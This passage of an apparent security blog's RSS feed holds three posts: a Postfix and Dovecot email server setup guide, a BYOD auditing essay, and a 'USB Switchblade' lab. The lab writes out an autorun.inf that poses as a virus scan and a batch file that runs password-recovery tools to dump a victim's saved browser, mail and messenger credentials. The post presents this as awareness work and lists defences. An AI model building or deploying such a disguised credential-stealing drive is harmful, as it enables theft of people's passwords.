			<wfw:commentRss>https://www.mafiasecurity.com/access-control/keystroke-dynamics/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux Email Server Advance Guide</title>
		<link>https://www.mafiasecurity.com/install-guides/linux-email-server-advance-guide/</link>
		<comments>https://www.mafiasecurity.com/install-guides/linux-email-server-advance-guide/#comments</comments>
		<pubDate>Thu, 07 Mar 2013 23:42:23 +0000</pubDate>
		<dc:creator>Ismail Saifudin</dc:creator>
				<category><![CDATA[Installations / Guides]]></category>
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">https://www.mafiasecurity.com/?p=1543</guid>
		<description><![CDATA[<p>The purpose of this article is to give an advanced guide to building an internal Linux email server with POP3 &#38; IMAP support over SSL, with access available via Thunderbird. For this Linux email server guide we will use Postfix as the SMTP server and Dovecot as the IMAP/POP3 &#38; authentication server, with Postfix using Dovecot’s SASL ...</p><p>The post <a href="https://www.mafiasecurity.com/install-guides/linux-email-server-advance-guide/">Linux Email Server Advance Guide</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>The purpose of this article is to give an advanced guide to building an internal Linux email server with POP3 &amp; IMAP support over SSL, with access available via Thunderbird. For this Linux email server guide we will use Postfix as the SMTP server and Dovecot as the IMAP/POP3 &amp; authentication server, with Postfix using Dovecot’s SASL function to authenticate clients (OpenSSL is used to generate the SSL keys).</p>
<h4>Environment:</h4>
<ul>
<li>We are using Debian 6.0 Squeeze installed without a GUI or system utilities on VMware Workstation 9.0.</li>
<li>During install I configured Debian to use separate /home, /usr, /var and /tmp partitions (this is optional).</li>
<li>I suggest installing and configuring vim for the purpose of this guide; it makes life infinitely easier.</li>
</ul>
<p><strong>VIM setup:</strong></p>
<p>user@debbie:~# sudo apt-get install vim<br />
user@debbie:~# sudo vi /etc/profile</p>
<p># add this as the last line (so typing vi opens vim):</p>
<p>alias vi='vim'</p>
<p># then add options to vim &#8211; these are just some I like:</p>
<p><b>user@debbie:~#</b> sudo vi ~/.vimrc</p>
<p>set nocompatible<br />
set fileformats=unix,dos<br />
set number<br />
set incsearch<br />
set list<br />
set showmatch<br />
syntax on<br />
highlight comment ctermfg=LightCyan<br />
set wrap</p>
<h4>Linux Email Server Setup</h4>
<p><b>Step 1. Install Postfix:</b></p>
<p>(Make sure you’ve set your user up in the sudoers list, or are installing this from root)</p>
<p><b>user@debbie:~#</b> sudo apt-get install postfix postfix-tls sasl2-bin</p>
<p># at the first screen, hit &lt;Ok&gt;</p>
<p># Select ‘No Configuration’ so we can edit our configs manually and set this up as we want.</p>
<p><b>Step 2. Configure postfix</b></p>
<p><b>user@debbie:~#</b> sudo cp /usr/lib/postfix/main.cf /etc/postfix/main.cf     #starting from scratch</p>
<p><b>user@debbie:~#</b> sudo vi /etc/postfix/main.cf                #learn/love vi – you’ll thank me.</p>
<p><span style="color: #ff0000;">#Line 59</span>: uncomment:</p>
<p>mail_owner = postfix</p>
<p><span style="color: #ff0000;">#line 76</span>: uncomment and specify your server’s FQDN (find it by running hostname --fqdn at a terminal)</p>
<p>myhostname = debian.lonestar.com</p>
<p><span style="color: #ff0000;">#line 104</span>: uncomment</p>
<p>myorigin = $mydomain</p>
<p><span style="color: #ff0000;">#line 118</span>: uncomment</p>
<p>inet_interfaces = all</p>
<p><span style="color: #ff0000;">#line 166:</span> uncomment</p>
<p>mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain</p>
<p><span style="color: #ff0000;"># line 209</span>: uncomment</p>
<p>local_recipient_maps = unix:passwd.byname $alias_maps</p>
<p><span style="color: #ff0000;"># line 268</span>: uncomment and specify your LAN (in our case it’s 192.168.1.0/24)</p>
<p>mynetworks = 127.0.0.0/8, 192.168.1.0/24</p>
<p><span style="color: #ff0000;"># line 388</span>: uncomment</p>
<p>alias_maps = hash:/etc/aliases</p>
<p><span style="color: #ff0000;"># line 399</span>: uncomment</p>
<p>alias_database = hash:/etc/aliases</p>
<p><span style="color: #ff0000;"># line 421</span>: uncomment (use Maildir)</p>
<p>home_mailbox = Maildir/</p>
<p><span style="color: #ff0000;"># line 526</span>: uncomment</p>
<p>header_checks = regexp:/etc/postfix/header_checks</p>
<p><span style="color: #ff0000;"># add</span>: mail body checking</p>
<p>body_checks = regexp:/etc/postfix/body_checks</p>
<p><span style="color: #ff0000;"># line 552</span>: comment out and add</p>
<p># smtpd_banner = $myhostname ESMTP $mail_name (@@DISTRO@@)</p>
<p>smtpd_banner = $myhostname ESMTP</p>
<p><span style="color: #ff0000;"># line 626</span>: add</p>
<p>sendmail_path = /usr/sbin/postfix</p>
<p><span style="color: #ff0000;"># line 631</span>: add</p>
<p>newaliases_path = /usr/bin/newaliases</p>
<p><span style="color: #ff0000;"># line 636</span>: add</p>
<p>mailq_path = /usr/bin/mailq</p>
<p><span style="color: #ff0000;"># line 642:</span> add</p>
<p>setgid_group = postdrop</p>
<p><span style="color: #ff0000;"># line 646</span>: comment out</p>
<p>#html_directory =</p>
<p><span style="color: #ff0000;"># line 650</span>: comment out</p>
<p>#manpage_directory =</p>
<p><span style="color: #ff0000;"># line 655</span>: comment out</p>
<p>#sample_directory =</p>
<p><span style="color: #ff0000;"># line 659</span>: comment out with #</p>
<p>#readme_directory =</p>
<p># If you want to limit email and mailbox size, add this to the end of the file (my example uses 10 MB &amp; 1 GB)</p>
<p>message_size_limit = 10485760</p>
<p>mailbox_size_limit = 1073741824</p>
<p># for SMTP-Auth settings add to the end of the config file:</p>
<p>smtpd_sasl_type = dovecot<br />
smtpd_sasl_path = private/auth-client<br />
smtpd_sasl_auth_enable = yes<br />
smtpd_sasl_security_options = noanonymous<br />
smtpd_sasl_local_domain = $myhostname<br />
smtpd_client_restrictions = permit_mynetworks,reject_unknown_client,permit<br />
smtpd_recipient_restrictions = permit_mynetworks,permit_auth_destination,permit_sasl_authenticated,reject</p>
<p><b># add the following to the end of the file for SSL:</b></p>
<p>smtpd_use_tls = yes<br />
smtpd_tls_cert_file = /etc/ssl/certs/server.crt<br />
smtpd_tls_key_file = /etc/ssl/certs/server.key<br />
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache</p>
<p><b>Step 3. Header and body checks:</b></p>
<p><b>root@mail:~#</b> sudo vi /etc/postfix/header_checks</p>
<p># add at the top (reject mail whose From or Return-Path address has the form &lt;#...@...&gt;, i.e. an empty/bogus sender address)</p>
<p>/^From:.*&lt;#.*@.*&gt;/ REJECT</p>
<p>/^Return-Path:.*&lt;#.*@.*&gt;/ REJECT</p>
<p><b>root@mail:~#</b> sudo vi /etc/postfix/body_checks</p>
<p># reject if an email includes &#8216;example.com&#8217; in mail body &#8211; blacklist</p>
<p>/^(|[^&gt;].*)example.com/ REJECT</p>
<p><b>root@mail:~#</b> sudo newaliases</p>
<p><b>root@mail:~#</b> sudo /etc/init.d/postfix restart</p>
<p><b>Linux Email Server Dovecot setup</b></p>
<p><b>root@mail:~#</b> sudo apt-get install dovecot-common dovecot-pop3d dovecot-imapd</p>
<p><b>root@mail:~#</b> sudo vi /etc/dovecot/dovecot.conf</p>
<p><span style="color: #ff0000;"># line 53</span>: uncomment</p>
<p>disable_plaintext_auth = yes</p>
<p><span style="color: #ff0000;"># line 95</span>: uncomment for SSL</p>
<p>ssl = yes</p>
<p><span style="color: #ff0000;"># line 230</span>: uncomment and add</p>
<p>mail_location = maildir:~/Maildir</p>
<p><span style="color: #ff0000;"># line 893</span>: add</p>
<p>mechanisms = plain login</p>
<p><span style="color: #ff0000;"># line 1120</span>: modify: (uncomment socket listen and client section)</p>
<p>socket listen {<br />
#master {<br />
# Master socket provides access to userdb information. It&#8217;s typically<br />
# used to give Dovecot&#8217;s local delivery agent access to userdb so it<br />
# can find mailbox locations.<br />
#path = /var/run/dovecot/auth-master<br />
#mode = 0600<br />
# Default user/group is the one who started dovecot-auth (root)<br />
#user =<br />
#group =<br />
#}<br />
client {<br />
# The client socket is generally safe to export to everyone. Typical use<br />
# is to export it to your SMTP server so it can do SMTP AUTH lookups<br />
# using it.<br />
path = /var/spool/postfix/private/auth-client   <b># uncomment and change</b><br />
mode = 0660 <b># uncomment</b><br />
user = postfix <b># add this</b><br />
group = postfix <b># add this</b><br />
}<br />
}</p>
<p><span style="color: #ff0000;"># line 100,101</span>: uncomment and specify certificate</p>
<p>ssl_cert_file = /etc/ssl/certs/server.crt<br />
ssl_key_file = /etc/ssl/certs/server.key</p>
<p>root@mail:~# /etc/init.d/postfix restart</p>
<p>Stopping Postfix Mail Transport Agent: postfix.</p>
<p>Starting Postfix Mail Transport Agent: postfix.</p>
<p><b>root@mail:~# </b>sudo /etc/init.d/dovecot restart</p>
<h4>Linux Email Server Advance Guide SSL Setup</h4>
<p><b>Step 1: Create SSL Certificate</b> (We will create our own since this is internal)</p>
<p><b>user@debbie:~#</b> cd /etc/ssl/certs<br />
<b>user@debbie:/etc/ssl/certs#</b> sudo openssl genrsa -des3 -out server.key 1024</p>
<p><b>#</b> After the following command, don’t enter a passphrase, just hit Enter. We do this to remove the passphrase; it is not required.</p>
<p><b>user@debbie:/etc/ssl/certs#</b> sudo openssl rsa -in server.key -out server.key</p>
<p><b>user@debbie:/etc/ssl/certs#</b> sudo openssl req -new -days 3650 -key server.key -out server.csr</p>
<p># You can use the defaults for the next 5 options, BUT at option 6 you MUST use your server’s FQDN (hostname --fqdn). In the case of this example it would be <b>debian.lonestar.com</b></p>
<p>You can then accept the defaults for the rest of the options if you’d like.</p>
<p><b>user@debbie:/etc/ssl/certs#</b> sudo openssl x509 -in server.csr -out server.crt -req -signkey server.key -days 3000</p>
<p>#allow owner to read all keys:</p>
<p><b>user@debbie:/etc/ssl/certs#</b> sudo chmod 400 server.*</p>
<p>cd ~</p>
<p><b>Step 2: Configuring the postfix master file</b></p>
<p><b>user@debbie:~#</b> sudo vi /etc/postfix/master.cf</p>
<p><span style="color: #ff0000;"># line 17-18</span>: uncomment</p>
<p>smtps       inet   n       -       n       -       -       smtpd<br />
  -o smtpd_tls_wrappermode=yes</p>
<p><b>root@mail:~#</b> sudo vi /etc/dovecot/dovecot.conf</p>
<h4>Testing Linux Email Server Advance Guide with Thunderbird:</h4>
<p>If the machine running Thunderbird is a different host, you will need to add the appropriate hosts-file or DNS entry so that Thunderbird can find your Linux server on the network.</p>
<p>In this example our workstation is a Windows 7 box with Thunderbird installed; edit its hosts file to add this line:</p>
<p>(IP of server)        (FQDN of server)</p>
<p>192.168.1.120      debian.lonestar.com</p>
<p>I’ve included the main.cf and master.cf files I used for Postfix in this Linux Email Server Advance Guide walkthrough.</p>
<p><a href="https://www.mafiasecurity.com/guides/email/main.cf">https://www.mafiasecurity.com/guides/email/main.cf</a><br />
<a href="https://www.mafiasecurity.com/guides/email/master.cf">https://www.mafiasecurity.com/guides/email/master.cf</a></p>
<p><b>Sources referenced for Linux Email Server Advance Guide:</b></p>
<p><a href="http://www.server-world.info/en/note?os=Debian_6.0&amp;p=mail">http://www.server-world.info/en/note?os=Debian_6.0&amp;p=mail</a><br />
<a href="http://library.linode.com/email/postfix/dovecot-system-users-debian-6-squeeze#sph_organize-mail-services">http://library.linode.com/email/postfix/dovecot-system-users-debian-6-squeeze#sph_organize-mail-services</a><br />
<a href="https://syslog.tv/2011/09/15/postfix-dovecot-imapimaps-sasl-maildir/" target="_blank">https://syslog.tv/2011/09/15/postfix-dovecot-imapimaps-sasl-maildir/</a></p>
<p>The post <a href="https://www.mafiasecurity.com/install-guides/linux-email-server-advance-guide/">Linux Email Server Advance Guide</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></content:encoded>
			<wfw:commentRss>https://www.mafiasecurity.com/install-guides/linux-email-server-advance-guide/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>USB Switchblade</title>
		<link>https://www.mafiasecurity.com/reviews-definitions/usb-switchblade/</link>
		<comments>https://www.mafiasecurity.com/reviews-definitions/usb-switchblade/#comments</comments>
		<pubDate>Tue, 05 Feb 2013 01:32:38 +0000</pubDate>
		<dc:creator>Aaron Townsend</dc:creator>
				<category><![CDATA[Installations / Guides]]></category>
		<category><![CDATA[Reviews / Definitions]]></category>
		<category><![CDATA[Attack Vector]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Information Warfare]]></category>
		<category><![CDATA[Penetration Testing]]></category>

		<guid isPermaLink="false">https://www.mafiasecurity.com:443/?p=1042</guid>
		<description><![CDATA[<p>USB storage devices are everywhere and just about anyone has a USB flash drive on them or has one at their house. People also pick up lost flash drives they find on the ground at work or outside of work and then end up using these flash drives, which aren&#8217;t verified and properly ...</p><p>The post <a href="https://www.mafiasecurity.com/reviews-definitions/usb-switchblade/">USB Switchblade</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>USB storage devices are everywhere and just about anyone has a USB flash drive on them or has one at their house. People also pick up lost flash drives they find on the ground at work or outside of work and then end up using these flash drives, which aren&#8217;t verified and properly wiped. The USB Switchblade example is very real and dangerous; while this article does show how passwords are recovered, it is not meant to help hackers but to make security professionals aware of the dangers of unsecured USB devices and their capabilities.</p>
<p>All that was needed for this lab is a spare USB flash drive. Another part of making this lab work is a basic understanding of Microsoft batch scripting. There are no specific space requirements; the executable files that are needed (MessenPass, Mail PassView, IE PassView, Protected Storage PassView, and PasswordFox) are all easily accessible on the internet, and no credentials are required to download them.</p>
<p>MessenPass, Mail PassView, IE PassView, Protected Storage PassView, and PasswordFox are all password recovery tools. MessenPass can recover passwords for MSN Messenger, Windows Live Messenger, Yahoo Messenger, Google Talk, etc&#8230; Mail PassView can get passwords for Outlook Express, Outlook 2000, Outlook 02/03/07/10, Windows Mail, Windows Live Mail, etc… IE PassView shows the passwords stored by the Internet Explorer web browser for sites where a user has saved logon information. It captures web address, username, and password information. Protected Storage PassView can reveal passwords stored by Internet Explorer, Outlook Express, and MSN Explorer in Protected Storage. The information about a Protected Storage program or device is stored in the registry, under “HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”. PasswordFox can retrieve user names and passwords stored by Mozilla Firefox, such as Record Index, Web Site, User Name, Password, etc&#8230; This program goes to wherever Firefox is installed on the computer, loads the admin profile and takes any information in the account. For any of these tools, if the corresponding programs aren’t installed on the local machine then nothing will come back in the txt file.</p>
<p>Example of Switchblade working: for this to work you’ll need a flash drive and the necessary executable files mentioned above. On the USB drive, create a Notepad document with the following information and then save it as autorun.inf.</p>
<p><b>open=launch.bat</b></p>
<p><b>ACTION= Perform a Virus Scan</b></p>
<p>Once that is done, copy and paste the MessenPass, Mail PassView, IE PassView, Protected Storage PassView, and PasswordFox exe files to the flash drive. Then create a second Notepad document, input the following, and save it as launch.bat.</p>
<p><b>start mspass.exe /stext mspass.txt</b></p>
<p><b>start mailpv.exe /stext mailpv.txt</b></p>
<p><b>start iepv.exe /stext iepv.txt</b></p>
<p><b>start pspv.exe /stext pspv.txt</b></p>
<p><b>start passwordfox.exe /stext passwordfox.txt</b></p>
<p>When the USB drive is plugged into the computer, the autorun.inf will pop up and ask if you want to perform a virus scan, as shown in Figure 1.</p>
<div id="attachment_1448" class="wp-caption aligncenter" style="width: 358px"><a href="https://www.mafiasecurity.com/reviews-definitions/usb-switchblade/attachment/usb1/" rel="attachment wp-att-1448"><img class="size-full wp-image-1448" title="usb switchblade" alt="usb switchblade" src="https://mafiasecurity.r.worldssl.net/wp-content/uploads/2012/12/usb1.png" width="348" height="367" /></a><p class="wp-caption-text">usb switchblade</p></div>
<p>(Figure 1)</p>
<p>If the user clicks on “Perform a Virus Scan”, it will then load the “launch.bat” file and run all the executables in the script. Once the script has run, any recovered information will be displayed in the text files where they were created. Shown in Figure 2 are the results of the program being run on a computer with administrative privileges. The password and login information are blocked out to protect the user.</p>
<div id="attachment_1449" class="wp-caption aligncenter" style="width: 429px"><a href="https://www.mafiasecurity.com/reviews-definitions/usb-switchblade/attachment/usb2/" rel="attachment wp-att-1449"><img class="size-full wp-image-1449" title="usb switchblade" alt="usb switchblade" src="https://mafiasecurity.r.worldssl.net/wp-content/uploads/2013/01/usb2.png" width="419" height="228" /></a><p class="wp-caption-text">usb switchblade</p></div>
<p>(Figure 2)</p>
<p>There are several ways to defend against this kind of physical attack. First, disable the autorun feature in Windows; this helps prevent the accidental execution of programs from foreign flash drives. Second, on certain high-profile computers/servers, disable USB functionality so that USB devices cannot be connected to the computer at all. Third, distribute USB flash drives purchased by the company for employees to use in the corporate environment.</p>
<p>The post <a href="https://www.mafiasecurity.com/reviews-definitions/usb-switchblade/">USB Switchblade</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></content:encoded>
			<wfw:commentRss>https://www.mafiasecurity.com/reviews-definitions/usb-switchblade/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Bring Your Own Device Auditing</title>
		<link>https://www.mafiasecurity.com/governance/bring-your-own-device-auditing/</link>
		<comments>https://www.mafiasecurity.com/governance/bring-your-own-device-auditing/#comments</comments>
		<pubDate>Tue, 29 Jan 2013 01:03:06 +0000</pubDate>
		<dc:creator>Anthony Giallombardo</dc:creator>
				<category><![CDATA[Governance]]></category>
		<category><![CDATA[Compliance]]></category>
		<category><![CDATA[Physical Security]]></category>
		<category><![CDATA[Privacy Issues]]></category>
		<category><![CDATA[Risk Management]]></category>

		<guid isPermaLink="false">https://www.mafiasecurity.com/?p=1504</guid>
		<description><![CDATA[<p>Security, privacy, and incident response are often the important drivers in a company’s decision to pursue bring your own device auditing (Navetta, 2012). When dealing with laptop device security and mobile device security, most companies’ policies are different even though both kinds of device have the same common security controls, such as encryption and VPN capabilities; ...</p><p>The post <a href="https://www.mafiasecurity.com/governance/bring-your-own-device-auditing/">Bring Your Own Device Auditing</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></description>
				<content:encoded><![CDATA[<p style="text-align: left;" align="center">Security, privacy, and incident response are often the important drivers in a company’s decision to pursue bring your own device auditing (Navetta, 2012). When dealing with laptop device security and mobile device security, most companies’ policies are different even though both kinds of device have the same common security controls, such as encryption and VPN capabilities; however, the divide starts when companies look at theft as the main issue for mobile devices and malware for laptops (Antonopoulos, 2011).</p>
<p style="text-align: left;" align="center">According to Navetta (2012):<br />
“One of the assumptions often reflected in conversations about Bring Your Own Device BYOD is that the organization has the luxury of creating a BYOD strategy based on a blank slate. The reality, however, is that the BYOD genie is already out of the bottle for many organizations. A recent survey of organizations conducted by found that 95% of surveyed organizations were permitting employees to use their own devices in some form in the workplace. According to the same study, each connected worker will have as many as three devices connected to employer networks by 2014.”</p>
<p style="text-align: left;">The most interesting fact about Bring Your Own Device is that Information Technology departments used to drive new technology into the business; with the release of the iPhone, however, the implementation of new technology shifted from the technology departments to the employees within the organization (Bradley, 2011).</p>
<h4>Pros for Bring Your Own Device Auditing:</h4>
<p>Any type of business entity which embraces Bring Your Own Device (BYOD) has advantages over competitors, such as shifting the bulk of the cost to the employee, who pays all of the costs for hardware and voice/data services &#8211; as much as $90 per month per user (Bradley, 2011). Intel did an interesting study, which showed:</p>
<p>According to Gruman (2012):<br />
About $150 million a year in increased productivity (57 extra minutes per day at Intel per BYOD employee) and cost savings, she says. Intel gets $3 in return for every $1 invested in supporting consumerization. By my calculations, that means a return of about $7,500 per BYOD employee for a cost of $2,500 per employee to enable, manage, and secure.</p>
<h4>Cons for Bring Your Own Device Auditing:</h4>
<p>Bring your own device, or bring your own disaster (BYOD), can be very difficult from both an operational and a policy governance standpoint. There are many hidden costs associated with BYOD, such as management software, employee behavior, expense reporting, and training (Kaneshige, 2012). There are many security reasons not to allow BYOD; however, the mistake many entities will make is in their mobile device policy versus their personal device policy, and in being able to enforce it without disastrous events for employees where company information on the personal device causes harm, physically or logically, to their personal device.</p>
<h4>Bring Your Own Device Auditing:</h4>
<p>Policies often indicate that the entity has every right to monitor personal device use while the device is connected to the company network, on the device itself, and in the transmission of any data from that device (Navetta, 2012). Of course, personal device use policies should include a notice that any information on the device may be accessed or viewed by the company, especially in the context of security incidents and investigations, audits, and litigation (Navetta, 2012).</p>
<p>It would be best if IT auditors had an advisory role when legal and/or the information security department create the policies and compliance requirements for these personal devices. In addition, if information that would normally be audited is accessed from or stored on the personal device, the employee must allow the IT auditor to audit the personal device.</p>
<h5>References for Bring Your Own Device Auditing</h5>
<p>Antonopoulos, A. (2011, July 27). IT security’s scariest acronym: BYOD, bring your own device. Retrieved January 28, 2013, from Network World website: <a href="http://www.networkworld.com/columnists/2011/072711-andreas.html" target="_blank">http://www.networkworld.com/columnists/2011/072711-andreas.html</a></p>
<p>Bradley, T. (2011, December 20). Pros and Cons of Bringing Your Own Device to Work. Retrieved January 28, 2013, from PCWorld website: <a href="http://www.pcworld.com/article/246760/pros_and_cons_of_byod_bring_your_own_device_.html" target="_blank">http://www.pcworld.com/article/246760/pros_and_cons_of_byod_bring_your_own_device_.html</a></p>
<p>Gruman, G. (2012, October 12). Afraid of BYOD? Intel shows a better way. Retrieved January 28, 2013, from InfoWorld website: <a href="http://www.infoworld.com/d/consumerization-of-it/afraid-of-byod-intel-shows-better-way-204123" target="_blank">http://www.infoworld.com/d/consumerization-of-it/afraid-of-byod-intel-shows-better-way-204123</a></p>
<p>Kaneshige, T. (2012, December 13). BYOD Planning and Costs: Everything You Need to Know. Retrieved January 28, 2013, from <a href="http://www.cio.com/article/723864/BYOD_Planning_and_Costs_Everything_You_Need_to_Know" target="_blank">http://www.cio.com/article/723864/BYOD_Planning_and_Costs_Everything_You_Need_to_Know</a></p>
<p>Navetta, D., Esq. (2012). The Legal Implications of BYOD: Preparing Personal Device Use Policies. ISSA Journal, 10(11).</p>
<p>The post <a href="https://www.mafiasecurity.com/governance/bring-your-own-device-auditing/">Bring Your Own Device Auditing</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></content:encoded>
			<wfw:commentRss>https://www.mafiasecurity.com/governance/bring-your-own-device-auditing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
